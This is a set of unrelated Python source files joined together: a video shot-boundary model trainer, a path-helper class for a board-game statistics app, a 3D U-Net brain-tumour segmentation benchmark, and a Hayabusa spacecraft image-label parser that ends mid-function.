        # Weight for class i is N / count_i; classes that never occur get 0
        # (they are never indexed by `labels` anyway).
        weights_per_class = {
            i: len(labels) / count if count != 0 else 0
            for i, count in enumerate(class_counts)
        }
        return [weights_per_class[label] for label in labels]
# helper functions for deepsbd testing
def calculate_accuracy_logits(outputs, targets):
    """Fraction of rows whose top-scoring output class matches the
    top-scoring target class (targets are one-hot / logit rows)."""
    n = targets.size(0)
    _, predicted = outputs.topk(1, 1, True)
    _, expected = targets.topk(1, 1, True)
    # Compare both as 1 x batch row vectors.
    matches = predicted.t().eq(expected.view(1, -1))
    return matches.float().sum().item() / n
def prf1_array(pos_label, neg_label, gt, preds):
    """Precision, recall and F1 for a binary task, plus raw confusion counts.

    `neg_label` is accepted for interface symmetry; anything that is not
    `pos_label` is treated as negative.
    Returns (precision, recall, f1, tp, tn, fp, fn).
    """
    tp = fp = tn = fn = 0.
    for truth, guess in zip(gt, preds):
        if guess == pos_label:
            # Predicted positive: true or false positive.
            if truth == guess:
                tp += 1.
            else:
                fp += 1.
        else:
            # Predicted negative: true or false negative.
            if truth == guess:
                tn += 1.
            else:
                fn += 1.
    precision = tp / (tp + fp) if tp + fp != 0 else 0
    recall = tp / (tp + fn) if tp + fn != 0 else 0
    f1 = (2 * precision * recall / (precision + recall)
          if precision + recall != 0 else 0)
    return (precision, recall, f1, tp, tn, fp, fn)
def get_label(res_tensor):
    """Row-wise argmax of a 2-D tensor, returned as a plain list
    (one predicted class index per row)."""
    return [np.argmax(row) for row in res_tensor.data.cpu().numpy()]
def test_deepsbd(model, dataloader):
    """Evaluate `model` over `dataloader` and print binary P/R/F1.

    Each batch yields (clip_tensor, label_list, _); labels arrive as a list
    of per-class tensors and are stacked/transposed into (batch, classes).
    Predictions are collapsed to a binary task (2 = shot boundary, 0 = not)
    before scoring with positive label 2.

    Returns (preds, labels, outputs) — binarized predictions, argmax'd
    ground-truth labels, and raw model outputs as nested lists.
    NOTE(review): relies on module-level `device` and `tqdm`.
    """
    preds = []
    labels = []
    outputs = []
    for clip_tensor, l, _ in tqdm(dataloader):
        o = model(clip_tensor.to(device))
        # labels come as a list of per-class tensors -> (batch, classes)
        l = torch.transpose(torch.stack(l).to(device), 0, 1).float()
        preds += get_label(o)
        labels += get_label(l)
        outputs += o.cpu().data.numpy().tolist()
    # Collapse the 3-way prediction to binary: class 2 vs everything else.
    preds = [2 if p == 2 else 0 for p in preds]
    precision, recall, f1, tp, tn, fp, fn = prf1_array(2, 0, labels, preds)
    print("Precision: {}, Recall: {}, F1: {}".format(precision, recall, f1))
    print("TP: {}, TN: {}, FP: {}, FN: {}".format(tp, tn, fp, fn))
    return preds, labels, outputs
def train_iterations(iterations, training_dataloader, model, criterion, optimizer,
                    scheduler, fold_num=1, log_file=None, save_every=100, start_iter=0):
    """Run `iterations` optimization steps over `training_dataloader`.

    The dataloader iterator is re-created whenever it is exhausted, so
    training can run for more steps than one pass over the data contains.
    Per-step loss/accuracy/precision/recall/F1 are printed and, if
    `log_file` is given, appended to it; a checkpoint (iteration, model and
    optimizer state) is saved under MODEL_SAVE_PATH every `save_every`
    steps as 'fold{fold_num}_{i}_iteration.pth'.

    NOTE(review): `scheduler` is accepted for interface compatibility but
    is never stepped inside this loop.
    """
    i = start_iter
    training_iter = iter(training_dataloader)
    while i < iterations:
        data = next(training_iter, None)
        # Bug fix: identity check instead of `== None` — `data` is a tuple
        # of tensors, and equality comparison is both unidiomatic and
        # fragile here.
        if data is None:
            # Dataloader exhausted: rewind it and retry this step.
            training_iter = iter(training_dataloader)
            continue
        i += 1
        clip_tensor, targets, _ = data
        outputs = model(clip_tensor.to(device))
        # Targets come as a list of per-class tensors -> (batch, classes).
        targets = torch.transpose(torch.stack(targets).to(device), 0, 1).float()
        loss = criterion(outputs, targets)
        acc = calculate_accuracy_logits(outputs, targets)
        # Collapse predictions to binary {0, 2}: 2 = shot boundary.
        preds = get_label(outputs)
        preds = [2 if p == 2 else 0 for p in preds]
        target_preds = get_label(targets)
        precision, recall, f1, tp, tn, fp, fn = prf1_array(
            2, 0, target_preds, preds)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        print('Epoch: [{0}/{1}]\t'
              'Loss_conf {loss_c:.4f}\t'
              'acc {acc:.4f}\t'
              'pre {pre:.4f}\t'
              'rec {rec:.4f}\t'
              'f1 {f1: .4f}\t'
              'TP {tp} '
              'TN {tn} '
              'FP {fp} '
              'FN {fn} '
              .format(
                  i, iterations, loss_c=loss.item(), acc=acc,
                  pre=precision, rec=recall, f1=f1,
                  tp=tp, tn=tn, fp=fp, fn=fn))
        if log_file is not None:
            log_file.write('Epoch: [{0}/{1}]\t'
                           'Loss_conf {loss_c:.4f}\t'
                           'acc {acc:.4f}\t'
                           'pre {pre:.4f}\t'
                           'rec {rec:.4f}\t'
                           'f1 {f1: .4f}\t'
                           'TP {tp} '
                           'TN {tn} '
                           'FP {fp} '
                           'FN {fn}\n'.format(
                               i, iterations, loss_c=loss.item(), acc=acc,
                               pre=precision, rec=recall, f1=f1,
                               tp=tp, tn=tn, fp=fp, fn=fn
                           ))
        if (i % save_every) == 0:
            save_file_path = os.path.join(
                MODEL_SAVE_PATH,
                'fold{}_{}_iteration.pth'.format(fold_num, i)
            )
            states = {
                'iteration': i,
                'state_dict': model.state_dict(),
                'optimizer': optimizer.state_dict()
            }
            torch.save(states, save_file_path)
print('Loading pretrained Kinetics data')
# resnet deepSBD pre-trained on Kinetics
deepsbd_resnet_model_no_clipshots = deepsbd_resnet.resnet18(
    num_classes=3,
    sample_size=128,
    sample_duration=16
)
deepsbd_resnet_model_no_clipshots = deepsbd_resnet_model_no_clipshots.to(device).train()
print('Training')
if TRAINING_SET in ['kfolds', 'ground_truth']:
    # K-fold training: hold out fold i and train on the remaining folds,
    # re-loading the Kinetics pre-trained weights before each fold.
    for i in range(5):
        with open(os.path.join(MODEL_SAVE_PATH, '{}.log'.format(i+1)), 'w') as log_file:
            training_datasets = DeepSBDWeakTrainDataset(
                deepsbd_datasets_weak_training[:i] + deepsbd_datasets_weak_training[i+1:])
            # Class-balanced sampling via per-sample inverse-frequency weights.
            fold_weights = torch.DoubleTensor(training_datasets.weights_for_balanced_classes())
            fold_sampler = torch.utils.data.sampler.WeightedRandomSampler(fold_weights, len(fold_weights))
            training_dataloader = DataLoader(
                training_datasets,
                num_workers=48,
                shuffle=False,
                batch_size=16,
                pin_memory=True,
                sampler=fold_sampler
            )
            criterion = nn.BCEWithLogitsLoss()
            # reset model
            deepsbd_resnet_model_no_clipshots.load_weights(PRETRAIN_PATH)
            optimizer = optim.SGD(deepsbd_resnet_model_no_clipshots.parameters(),
                lr=.001, momentum=.9, weight_decay=1e-3)
            # NOTE(review): very large patience effectively disables LR drops.
            scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, 'min',patience=60000)
            train_iterations(
                5000, training_dataloader,
                deepsbd_resnet_model_no_clipshots,
                criterion, optimizer, scheduler, fold_num = i + 1,
                log_file = log_file, start_iter = 0, save_every=1000
            )
elif TRAINING_SET in ['400_min', '4000_min', '40000_min', 'all_movies']:
    # Single training run over all weak-label data; iteration budget scales
    # with the size of the training set (chosen below).
    with open(os.path.join(MODEL_SAVE_PATH, '{}.log'.format(TRAINING_SET)), 'a') as log_file:
        #if True:
        #    log_file = None
        training_datasets = DeepSBDWeakTrainDataset(deepsbd_datasets_weak_training)
        fold_weights = torch.DoubleTensor(training_datasets.weights_for_balanced_classes())
        fold_sampler = torch.utils.data.sampler.WeightedRandomSampler(fold_weights, len(fold_weights))
        # Close DB connections before forking DataLoader workers.
        django.db.connections.close_all()
        training_dataloader = DataLoader(
            training_datasets,
            num_workers=48,
            shuffle=False,
            batch_size=16,
            pin_memory=True,
            sampler=fold_sampler
        )
        criterion = nn.BCEWithLogitsLoss()
        # reset model
        deepsbd_resnet_model_no_clipshots.load_weights(PRETRAIN_PATH)
        optimizer = optim.SGD(deepsbd_resnet_model_no_clipshots.parameters(),
            lr=.001, momentum=.9, weight_decay=1e-3)
        start_iter = 0
        # Optionally resume from a saved checkpoint.
        if CONTINUE_PATH is not None:
            checkpoint = torch.load(CONTINUE_PATH)
            deepsbd_resnet_model_no_clipshots.load_state_dict(checkpoint['state_dict'])
            optimizer.load_state_dict(checkpoint['optimizer'])
            start_iter = checkpoint['iteration']
        scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, 'min',patience=60000)
        train_iterations(
            (4000 if TRAINING_SET == '400_min'
             else 30000 if TRAINING_SET == '4000_min'
             else 400000 if TRAINING_SET == '40000_min'
             else 800000 if TRAINING_SET == 'all_movies'
             else 5000),
            training_dataloader,
            deepsbd_resnet_model_no_clipshots,
            criterion, optimizer, scheduler,
            log_file = log_file, start_iter = start_iter, save_every=5000 if TRAINING_SET in ['40000_min', 'all_movies'] else 1000
        )
#print('Testing')
#
## test K folds
#for i in range(0, 5):
# # load
# weights = torch.load(os.path.join(
# MODEL_SAVE_PATH,
# 'fold{}_{}_iteration.pth'.format(
# i + 1 if TRAINING_SET == 'kfolds' else 1,
# (400 if TRAINING_SET == 'kfolds'
# else 4000 if TRAINING_SET == '400_min'
# else 60000 if TRAINING_SET == '4000_min'
# else 400000)
# )))['state_dict']
# deepsbd_resnet_model_no_clipshots.load_state_dict(weights)
# deepsbd_resnet_model_no_clipshots = deepsbd_resnet_model_no_clipshots.eval()
# test_dataset = deepsbd_datasets_weak_testing[i]
# dataloader = DataLoader(test_dataset, batch_size=8, shuffle=False, num_workers=16)
# test_deepsbd(deepsbd_resnet_model_no_clipshots, dataloader)
|
import os
from definitions import OUTSIDE_ROOT_DIR, INSIDE_ROOT_DIR
from src import _version
from src.utils import Utils
class Path:
    """
    Central registry of file-system paths and file names used by the app.

    NOTE(review): this class shadows ``pathlib.Path``; keep that in mind
    before adding ``from pathlib import Path`` anywhere in this module.
    """
    DEFAULT_INPUT_PATH = OUTSIDE_ROOT_DIR + "/input/"
    DEFAULT_OUTPUT_PATH = OUTSIDE_ROOT_DIR + "/output/"
    DEFAULT_LOG_PATH = OUTSIDE_ROOT_DIR + "/log/"
    DEFAULT_DATA_PATH = INSIDE_ROOT_DIR + "/data/"
    DEFAULT_DIST_PATH = OUTSIDE_ROOT_DIR + "/dist/"
    DEFAULT_IMAGE_PATH = INSIDE_ROOT_DIR + "/img/"
    DEFAULT_DIST_IMAGE_PATH = OUTSIDE_ROOT_DIR + "/dist/img/"
    DEFAULT_ROOT_PATH = OUTSIDE_ROOT_DIR + "/"
    DEFAULT_SCORE_OUTPUT_FILE_FORMAT = "score_{player_name}.png"
    DEFAULT_SCORE_FILE = "scores.csv"
    DEFAULT_SCORE_MODEL_FILE = "scores_model.csv"
    DEFAULT_I18N_FILE = "i18n.csv"
    DEFAULT_LOG_FILE = "log.log"
    DEFAULT_INI_FILE = "wingspan.stats.ini"
    DEFAULT_INI_MODEL_FILE = "wingspan.stats.model.ini"
    DEFAULT_IMAGE_FILE = "example.png"
    DEFAULT_README_FILE = "README.md"
    DEFAULT_EXEC_UNIX_FILE = "wingspan-stats"
    DEFAULT_EXEC_WINDOWS_FILE = "wingspan-stats.exe"
    DEFAULT_ZIP_NAME = "{name}-{version}-{env}"

    @staticmethod
    def get_dist_path():
        """
        This function returns the dist path.
        :return: The dist path.
        """
        return Path.DEFAULT_DIST_PATH

    @staticmethod
    def get_output_save_path(player_name):
        """
        This function returns the path where we write the score of player with player_name.
        :param player_name: The name of the player.
        :return: The path where we write the score of player_name.
        """
        Utils.create_folder_if_not_exist(Path.DEFAULT_OUTPUT_PATH)
        return os.path.join(Path.DEFAULT_OUTPUT_PATH,
                            Path.DEFAULT_SCORE_OUTPUT_FILE_FORMAT.format(player_name=player_name))

    @staticmethod
    def get_score_path():
        """
        This function returns the path where we read the scores.
        :return: The path where we read the scores.
        """
        Utils.create_folder_if_not_exist(Path.DEFAULT_INPUT_PATH)
        return os.path.join(Path.DEFAULT_INPUT_PATH, Path.DEFAULT_SCORE_FILE)

    @staticmethod
    def get_score_model_path():
        """
        This function returns the path where we read the scores model file.
        :return: The path where we read the scores model file.
        """
        Utils.create_folder_if_not_exist(Path.DEFAULT_DATA_PATH)
        return os.path.join(Path.DEFAULT_DATA_PATH, Path.DEFAULT_SCORE_MODEL_FILE)

    @staticmethod
    def get_i18n_path():
        """
        This function returns the path where we read the translations.
        :return: The path where we read the translations.
        """
        Utils.create_folder_if_not_exist(Path.DEFAULT_DATA_PATH)
        return os.path.join(Path.DEFAULT_DATA_PATH, Path.DEFAULT_I18N_FILE)

    @staticmethod
    def get_img_path():
        """
        This function returns the path where the example image is stored.
        :return: The path where the example image is stored.
        """
        return os.path.join(Path.DEFAULT_IMAGE_PATH, Path.DEFAULT_IMAGE_FILE)

    @staticmethod
    def get_dist_img_path():
        """
        This function returns the path where the example image will be stored.
        :return: The path where the example image will be stored.
        """
        Utils.create_folder_if_not_exist(Path.DEFAULT_DIST_IMAGE_PATH)
        return os.path.join(Path.DEFAULT_DIST_IMAGE_PATH, Path.DEFAULT_IMAGE_FILE)

    @staticmethod
    def get_readme_path():
        """
        This function returns the path where the help file is stored.
        :return: The path where the help file is stored.
        """
        return os.path.join(Path.DEFAULT_ROOT_PATH, Path.DEFAULT_README_FILE)

    @staticmethod
    def get_dist_readme_path():
        """
        This function returns the path where the help file will be stored.
        :return: The path where the help file will be stored.
        """
        # Bug fix: create the dist folder the README is written into, not
        # the dist *image* folder as before.
        Utils.create_folder_if_not_exist(Path.DEFAULT_DIST_PATH)
        return os.path.join(Path.DEFAULT_DIST_PATH, Path.DEFAULT_README_FILE)

    @staticmethod
    def get_ini_path():
        """
        This function returns the path where we read the configurations.
        :return: The path where we read the configurations.
        """
        return os.path.join(Path.DEFAULT_ROOT_PATH, Path.DEFAULT_INI_FILE)

    @staticmethod
    def get_ini_model_path():
        """
        This function returns the path where we read the model configurations.
        :return: The path where we read the model configurations.
        """
        Utils.create_folder_if_not_exist(Path.DEFAULT_DATA_PATH)
        return os.path.join(Path.DEFAULT_DATA_PATH, Path.DEFAULT_INI_MODEL_FILE)

    @staticmethod
    def get_exe_path():
        """
        This function returns the path where we store the exec file.
        Defaults to the unix path on unrecognized platforms.
        :return: The path where we store the exec file.
        """
        if Utils.is_windows():
            return Path.get_windows_exe_path()
        return Path.get_unix_exe_path()

    @staticmethod
    def get_unix_exe_path():
        """
        This function returns the path where we store the unix exec file.
        :return: The path where we store the unix exec file.
        """
        return os.path.join(Path.DEFAULT_DIST_PATH, Path.DEFAULT_EXEC_UNIX_FILE)

    @staticmethod
    def get_windows_exe_path():
        """
        This function returns the path where we store the windows exec file.
        :return: The path where we store the windows exec file.
        """
        return os.path.join(Path.DEFAULT_DIST_PATH, Path.DEFAULT_EXEC_WINDOWS_FILE)

    @staticmethod
    def get_zip_dest():
        """
        This function returns the path where we store the windows exec file.
        :return: The path where we store the windows exec file.
        """
        # NOTE(review): this duplicates get_windows_exe_path() and, despite
        # its name, does NOT return a zip path — it looks like a copy-paste
        # of get_windows_exe_path(); probably it should delegate to
        # get_zip_path(). Behavior kept unchanged; confirm with callers.
        return os.path.join(Path.DEFAULT_DIST_PATH, Path.DEFAULT_EXEC_WINDOWS_FILE)

    @staticmethod
    def get_zip_path(with_extension=False):
        """
        This function returns the path of the release zip archive for the
        current os.
        :param with_extension: If we want to add the .zip extension.
        :return: The path of the release zip archive.
        """
        name = "wingspan-stats"
        version = _version.__version__
        if Utils.is_linux():
            env = "linux"
        elif Utils.is_windows():
            env = "windows"
        else:
            env = "mac"
        base_name = Path.DEFAULT_ZIP_NAME.format(name=name, version=version, env=env)
        # Bug fix: the extension must be appended to the file name —
        # passing ".zip" to os.path.join as a separate component produced
        # ".../<name>/.zip" instead of ".../<name>.zip".
        return os.path.join(Path.DEFAULT_DIST_PATH,
                            base_name + (".zip" if with_extension else ""))

    @staticmethod
    def get_log_path():
        """
        This function returns the path where we store the logs, creating the
        log folder and an empty log file if they do not exist.
        :return: The path where we store the logs.
        """
        Utils.create_folder_if_not_exist(Path.DEFAULT_LOG_PATH)
        path = os.path.join(Path.DEFAULT_LOG_PATH, Path.DEFAULT_LOG_FILE)
        # Bug fix: close the file handle instead of leaking it; the open
        # in append mode only serves to create the file if missing.
        with open(path, 'a+'):
            pass
        return path
|
<gh_stars>100-1000
import os
import glob
from unet3d.data import write_data_to_file, open_data_file
from unet3d.generator import get_training_and_validation_generators
from unet3d.model import unet_model_3d
from unet3d.training import load_old_model, train_model
import argparse
import keras
import time
import sys
parser = argparse.ArgumentParser(description='train opts:')
parser.add_argument('--bs', type=int, default=1)
parser.add_argument('--intra', '--num_intra_threads', type=int, default=56)
parser.add_argument('--inter', '--num_inter_threads', type=int, default=1)
parser.add_argument('--warmup', '--nw', type=int, default=10)
parser.add_argument('--report_interval', type=int, default=1)
parser.add_argument('--nb', type=int, default=10)
args = parser.parse_args()
import tensorflow as tf
from keras import backend as K
config = tf.ConfigProto(intra_op_parallelism_threads=args.intra, inter_op_parallelism_threads=args.inter)
sess = tf.Session(graph=tf.get_default_graph(), config=config)
K.set_session(sess)
class TimeReporter(keras.callbacks.Callback):
    """Keras callback that times each batch and reports throughput.

    Batches before ``config['warmup']`` are ignored; once
    ``config['n_batch']`` batches (warmup included) have run, the average
    samples/sec is printed and the process exits via sys.exit().

    NOTE(review): reads the module-level ``config`` dict; the
    ``config['report_interval']`` value read by the original code was never
    used and has been dropped.
    """

    def on_batch_begin(self, batch, logs=None):
        # Timestamp taken at the start of every batch.
        self._start_time = time.time()

    def on_batch_end(self, batch, logs=None):
        end_time = time.time()
        # Bug fix: the original used hasattr(self, '__stop') to guard
        # against running after the report, but `self.__stop = True` inside
        # this class is name-mangled to `_TimeReporter__stop`, so the
        # hasattr check could never succeed. Use an unmangled private
        # attribute instead.
        if getattr(self, '_stop', False):
            return
        if not hasattr(self, 'elapsed_time'):
            self.elapsed_time = 0
        if not hasattr(self, 'elapsed_step'):
            self.elapsed_step = 0
        warmup = config['warmup']
        if batch >= warmup:
            self.elapsed_time += (end_time - self._start_time)
            self.elapsed_step += 1
            if self.elapsed_step + warmup == config['n_batch']:
                print('\nTotal samples/sec: %.4f samples/s' % (self.elapsed_step * config["batch_size"] / self.elapsed_time))
                self.elapsed_time = 0
                self.elapsed_step = 0
                self._stop = True
                sys.exit()
# Training/benchmark configuration for the 3D U-Net. Data/model locations
# come from the environment (DATASET_LOCATION, IN_GRAPH); benchmark knobs
# (batch size, warmup, batch count) come from the CLI args parsed above.
config = dict()
config["pool_size"] = (2, 2, 2)  # pool size for the max pooling operations
config["image_shape"] = (144, 144, 144)  # This determines what shape the images will be cropped/resampled to.
config["patch_shape"] = (64, 64, 64)  # switch to None to train on the whole image
config["labels"] = (1, 2, 4)  # the label numbers on the input image
config["n_labels"] = len(config["labels"])
config["all_modalities"] = ["t1", "t1Gd", "flair", "t2"]
config["training_modalities"] = config["all_modalities"]  # change this if you want to only use some of the modalities
config["nb_channels"] = len(config["training_modalities"])
# Network input is (channels, *patch_shape) when patch training is enabled,
# otherwise (channels, *image_shape).
if "patch_shape" in config and config["patch_shape"] is not None:
    config["input_shape"] = tuple([config["nb_channels"]] + list(config["patch_shape"]))
else:
    config["input_shape"] = tuple([config["nb_channels"]] + list(config["image_shape"]))
config["truth_channel"] = config["nb_channels"]
config["deconvolution"] = True  # if False, will use upsampling instead of deconvolution
config["batch_size"] = args.bs
config["validation_batch_size"] = 12
config["n_epochs"] = 500  # cutoff the training after this many epochs
config["patience"] = 10  # learning rate will be reduced after this many epochs if the validation loss is not improving
config["early_stop"] = 50  # training will be stopped after this many epochs without the validation loss improving
config["initial_learning_rate"] = 0.00001
config["learning_rate_drop"] = 0.5  # factor by which the learning rate will be reduced
config["validation_split"] = 0.8  # portion of the data that will be used for training
config["flip"] = False  # augments the data by randomly flipping an axis during
config["permute"] = True  # data shape must be a cube. Augments the data by permuting in various directions
config["distort"] = None  # switch to None if you want no distortion
config["augment"] = config["flip"] or config["distort"]  # note: with distort=None this reduces to the value of "flip"
config["validation_patch_overlap"] = 0  # if > 0, during training, validation patches will be overlapping
config["training_patch_start_offset"] = (16, 16, 16)  # randomly offset the first patch index by up to this offset
config["skip_blank"] = True  # if True, then patches without any target will be skipped
config["data_file"] = os.path.join(os.environ["DATASET_LOCATION"], "brats_data.h5")
config["model_file"] = os.environ["IN_GRAPH"]
config["training_file"] = os.path.join(os.environ["DATASET_LOCATION"], "training_ids.pkl")
config["validation_file"] = os.path.join(os.environ["DATASET_LOCATION"], "validation_ids.pkl")
config["overwrite"] = False  # If True, will overwrite previous files. If False, will use previously written files.
config['warmup'] = args.warmup  # batches ignored by TimeReporter before timing starts
config['report_interval'] = args.report_interval
config['n_batch'] = args.nb  # total batches after which TimeReporter reports and exits
def fetch_training_data_files():
    """Collect per-subject NIfTI file tuples from data/preprocessed.

    For every subject directory matching data/preprocessed/*/*, returns a
    tuple of paths: one file per training modality plus the "truth" volume.
    """
    pattern = os.path.join(os.path.dirname(__file__), "data", "preprocessed", "*", "*")
    return [
        tuple(os.path.join(subject_dir, modality + ".nii.gz")
              for modality in config["training_modalities"] + ["truth"])
        for subject_dir in glob.glob(pattern)
    ]
def main(overwrite=False):
    """Build (or reuse) the HDF5 dataset, build (or load) the 3D U-Net,
    then train it with the configured generators.

    :param overwrite: if True, rebuild the HDF5 data file and instantiate a
        fresh model even when saved files exist.
    """
    # convert input images into an hdf5 file
    if overwrite or not os.path.exists(config["data_file"]):
        training_files = fetch_training_data_files()
        write_data_to_file(training_files, config["data_file"], image_shape=config["image_shape"])
    data_file_opened = open_data_file(config["data_file"])
    # Reuse a previously saved model unless overwriting.
    if not overwrite and os.path.exists(config["model_file"]):
        model = load_old_model(config["model_file"])
    else:
        # instantiate new model
        model = unet_model_3d(input_shape=config["input_shape"],
                              pool_size=config["pool_size"],
                              n_labels=config["n_labels"],
                              initial_learning_rate=config["initial_learning_rate"],
                              deconvolution=config["deconvolution"])
    # get training and testing generators
    train_generator, validation_generator, n_train_steps, n_validation_steps = get_training_and_validation_generators(
        data_file_opened,
        batch_size=config["batch_size"],
        data_split=config["validation_split"],
        overwrite=overwrite,
        validation_keys_file=config["validation_file"],
        training_keys_file=config["training_file"],
        n_labels=config["n_labels"],
        labels=config["labels"],
        patch_shape=config["patch_shape"],
        validation_batch_size=config["validation_batch_size"],
        validation_patch_overlap=config["validation_patch_overlap"],
        training_patch_start_offset=config["training_patch_start_offset"],
        permute=config["permute"],
        augment=config["augment"],
        skip_blank=config["skip_blank"],
        augment_flip=config["flip"],
        augment_distortion_factor=config["distort"])
    print('run training')
    # run training (TimeReporter will print throughput and exit the
    # process once config['n_batch'] batches have run)
    train_model(model=model,
                model_file=config["model_file"],
                training_generator=train_generator,
                validation_generator=validation_generator,
                steps_per_epoch=n_train_steps,
                validation_steps=n_validation_steps,
                initial_learning_rate=config["initial_learning_rate"],
                learning_rate_drop=config["learning_rate_drop"],
                learning_rate_patience=config["patience"],
                early_stopping_patience=config["early_stop"],
                n_epochs=config["n_epochs"],
                timer=TimeReporter)
    data_file_opened.close()
# Script entry point: build/open the dataset and run the benchmark training.
if __name__ == "__main__":
    main(overwrite=config["overwrite"])
|
import math
from math import radians as rads, degrees as degs
import re
from configparser import ConfigParser
from ast import literal_eval
from decimal import *
getcontext().prec = 6
import numpy as np
import quaternion
from astropy.coordinates import SkyCoord
from astropy.time import Time
from astropy import units
from visnav.settings import *
from visnav.algo import tools
# Data main page: https://sbn.psi.edu/pds/resource/hayamica.html
#
# Two sets of (bad) metadata!
#
# Photometry based, supposedly more accurate, used for image lbl files:
# - Info from https://sbnarchive.psi.edu/pds3/hayabusa/HAY_A_AMICA_3_HAYAMICA_V1_0/data/parameters/paramphot.lbl
# - Data from https://sbnarchive.psi.edu/pds3/hayabusa/HAY_A_AMICA_3_HAYAMICA_V1_0/data/parameters/paramphot.tab
#
# LIDAR based, at least distances are more reasonable (phot 300m vs lidar 8km)
# However, places asteroid between s/c and sun so that phase angle almost 180 deg instead of close to 0 deg as should
# - Info from https://sbnarchive.psi.edu/pds3/hayabusa/HAY_A_AMICA_3_HAYAMICA_V1_0/data/parameters/paramlid.lbl
# - Data from https://sbnarchive.psi.edu/pds3/hayabusa/HAY_A_AMICA_3_HAYAMICA_V1_0/data/parameters/paramlid.tab
#
#
# >>>>
# ======================================================================
# Geometry Information - Coordinate System:
# ======================================================================
#
# The label files include the following geometric variables:
# - SC SUN POSITION VECTOR: The vector from the spacecraft to the Sun
# in equatorial J2000 inertial frame.
# - SC TARGET POSITION VECTOR: The vector from the spacecraft to the
# centre of the comet nucleus in equatorial J2000 inertial frame.
# - SC TARGET VELOCITY VECTOR: The spacecraft to comet nucleus velocity
# vector in in equatorial J2000 inertial frame.
# - TARGET CENTER DISTANCE: The distance between the spacecraft and the
# comet nucleus centre. (Note that also for checkout and stellar
# calibration images the comet nucleus distance is given here.)
# - SUB SPACECRAFT LATITUDE and SUB SPACECRAFT LONGITUDE: The latitude
# and longitude of the sub-spacecraft point derived from the Flight
# Dynamics body-fixed reference frame implicitly specified by the
# information provided in the comet attitude file CATT.
# - RIGHT ASCENSION and DECLINATION: Right Ascension and Declination of
# the camera boresight direction in equatorial J2000 inertial frame.
# - CELESTIAL NORTH CLOCK ANGLE: The direction of celestial north at the
# center of the image - measured from the upward direction,
# clockwise to the direction toward celestial north.
# - SOLAR ELONGATION: The angle between the line of sight of observation
# and the direction of the Sun.
# - BODY_POLE_CLOCK_ANGLE: specifies the direction of the target body's
# rotation axis in an image. It is measured from the 'upward' direction,
# clockwise to the direction of the northern rotational pole as projected
# into the image plane, assuming the image is displayed as defined by
# the SAMPLE_DISPLAY_DIRECTION and LINE_DISPLAY_DIRECTION elements.
# - HAY:BODY_POLE_SUN_ANGLE: specifies the angle between the rotation pole
# of the target body and the direction from the target body to the sun
# - HAY:BODY_POLE_ASPECT_ANGLE: Specifies the angle of the rotation pole
# of the body with respect to the image plane
#
# All geometric values are calculated for the time t = IMAGE TIME
# (and not START TIME).
def load_image_meta(src, sm):
    """Parse a Hayabusa AMICA PDS .lbl file and print derived geometry.

    The label text is massaged into INI form, parsed with ConfigParser, and
    the spacecraft/asteroid/sun geometry is converted from the label's
    per-body angles into vectors and quaternions, which are printed.

    :param src: path to the .lbl metadata file.
    :param sm: unused here — presumably a system-model object used by
        callers elsewhere; TODO confirm.
    """
    # params given in equatorial J2000 coordinates, details:
    # https://pds.nasa.gov/ds-view/pds/viewProfile.jsp
    # ?dsid=RO-C-NAVCAM-2-ESC3-MTP021-V1.0
    with open(src, 'r') as f:
        config_data = f.read()
    # Rewrite the PDS label into INI syntax: add a section header, turn
    # comments into '#', drop pointer lines, mangle NS-qualified keys
    # (HAY:X -> HAY__X), strip END/NOTE/OBJECT blocks and unit suffixes.
    config_data = '[meta]\n' + config_data
    config_data = re.sub(r'^/\*', '#', config_data, flags=re.M)
    config_data = re.sub(r'^\^', '', config_data, flags=re.M)
    config_data = re.sub(r'^(\w+):(\w+)', r'\1__\2', config_data, flags=re.M)
    config_data = re.sub(r'^END\s*$', '', config_data, flags=re.M)
    config_data = re.sub(r'^NOTE\s*=\s*"[^"]*"', '', config_data, flags=re.M)
    config_data = re.sub(r'^OBJECT\s*=\s*.*?END_OBJECT\s*=\s*\w+', '', config_data, flags=re.M|re.S)
    config_data = re.sub(r' <(DEGREE|SECOND|KILOMETER)>', '', config_data)
    config = ConfigParser(converters={'tuple': literal_eval})
    config.read_string(config_data)
    image_time = config.get('meta', 'START_TIME')
    # spacecraft orientation, equatorial J2000
    sc_rot_ra = config.getfloat('meta', 'RIGHT_ASCENSION')
    sc_rot_dec = config.getfloat('meta', 'DECLINATION')
    sc_rot_cnca = config.getfloat('meta', 'CELESTIAL_NORTH_CLOCK_ANGLE')
    sc_igrf_q = tools.ypr_to_q(rads(sc_rot_dec), rads(sc_rot_ra), -rads(sc_rot_cnca))  # same with rosetta lbls also
    # from asteroid to spacecraft, asteroid body fixed coordinates
    # TODO: figure out why FOR SOME REASON distance is given ~30x too close
    ast_sc_dist = config.getfloat('meta', 'TARGET_CENTER_DISTANCE') * 30
    ast_sc_lat = config.getfloat('meta', 'SUB_SPACECRAFT_LATITUDE')
    ast_sc_lon = config.getfloat('meta', 'SUB_SPACECRAFT_LONGITUDE')
    ast_sc_bff_r = tools.spherical2cartesian(rads(ast_sc_lat), rads(ast_sc_lon), ast_sc_dist)
    ast_axis_img_clk_ang = config.getfloat('meta', 'BODY_POLE_CLOCK_ANGLE')
    ast_axis_img_plane_ang = config.getfloat('meta', 'HAY__BODY_POLE_ASPECT_ANGLE')  # what is the use?
    # from sun to spacecraft, equatorial J2000
    ast_sun_dist = config.getfloat('meta', 'TARGET_HELIOCENTRIC_DISTANCE')
    ast_sun_lat = config.getfloat('meta', 'SUB_SOLAR_LATITUDE')
    ast_sun_lon = config.getfloat('meta', 'SUB_SOLAR_LONGITUDE')
    sun_ast_bff_r = -tools.spherical2cartesian(rads(ast_sun_lat), rads(ast_sun_lon), ast_sun_dist)
    sun_sc_bff_r = sun_ast_bff_r + ast_sc_bff_r
    ast_axis_sun_ang = config.getfloat('meta', 'HAY__BODY_POLE_SUN_ANGLE')
    a = config.getfloat('meta', 'SUB_SOLAR_AZIMUTH')  # what is this!?
    # TODO: continue here
    ast_axis_scf_q = tools.ypr_to_q(-rads(ast_sc_lat), -rads(ast_sc_lon), 0)
    # TODO: figure out: how to get roll as some ast_axis_img_clk_ang come from ast_sc_lat?
    ast_rot_scf_q = tools.ypr_to_q(0, 0, -rads(ast_axis_img_clk_ang))
    ast_scf_q = ast_axis_scf_q  #* ast_rot_scf_q
    # Pole direction in RA/dec form; fold into valid range when dec > 90.
    dec = 90 - ast_sc_lat
